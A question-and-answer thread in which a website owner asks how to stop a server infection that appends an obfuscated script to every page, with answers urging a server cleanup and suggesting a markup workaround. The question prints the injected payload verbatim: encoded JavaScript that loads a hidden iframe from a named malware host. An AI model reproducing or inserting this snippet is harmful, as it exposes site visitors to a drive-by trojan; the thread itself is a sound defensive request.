Programatically stopping a specific chunk of code in html/javascript/css

Question

The server that has my website on it also has a virus on it.

The virus injects the malicious code

<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script>

onto EVERY single page which is served, and it is being preprocessed by Apache or something similar to add it to the end of the file.

I created a test file, with the following code:

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
</body>
</html>

It isn't pretty, but it served its purpose.

When viewing the page in my browser, I get

<html> 
<head> 
<title>Test HTML File</title> 
</head> 
<body> 
<h1>Test HTML File</h1> 
<b id="BAs"></b><script>/*Warning: Opera Only*/var hKo = document.createElement("script");hKo.text="document.write(unescape(\"%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%6e%63%63%63%6e%6e%6e%63%2e%63%6e%2f%69%6d%67%2f%69%6e%64%65%78%2e%70%68%70%27%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%6e%6f%6e%65%3b%27%3e%3c%2f%69%66%72%61%6d%65%3e\"));";document.getElementById("BAs").appendChild(hKo)</script> 
</body> 
</html>

which can be viewed from www.sagamountain.com/testfile.html (warning, this page is infected)

I need to programmatically stop that div and that script from executing, as it is an iframe to a site with a trojan on it. HTML, CSS, or JS, I just need some way to prevent that JS from executing.

It is already display:none so you cannot see it, but how can I prevent the iframe from ever loading at all?

Thanks for the help! The unescape thing resolves to an iframe to http://ncccnnnc.cn/img/index.php which is clearly the source of my troubles. Don't go to that site!

EDIT: This is a followup to https://serverfault.com/questions/78439/my-website-is-infected-i-restored-a-backup-of-the-uninfected-files-how-long-wil/78459#78459

Answer 1

I'm sorry that I can't answer your specific question, but I think that you're looking at this the wrong way. What you need to do is not strip out the virus-inserted html, what you need to do is talk to your web-host/sysadmin and strip out the virus.

Treating the symptoms won't cure the infection. Treating the disease, however, will also treat the symptoms as well as removing the virus.

Answer 2

The file that is in your server is a php file look in the comments here.

Answer 3

Cyber, if you have to wait on the server to be fixed by someone else, I'd say you should try ending your documents with an open <noscript> tag or open HTML comment tag.

You can't use Javascript to stop content that hasn't been rendered from doing so, unless you use document.write and one of the above tags (noscript/comment). Also you can't do anything by placing a script after, as it is already too late (the content is there already).

It is an ugly solution but should prevent your site visitors from experiencing the virus. It also makes your markup invalid, but any browser should be able to parse it and render it as you expect.

Best of luck with the server!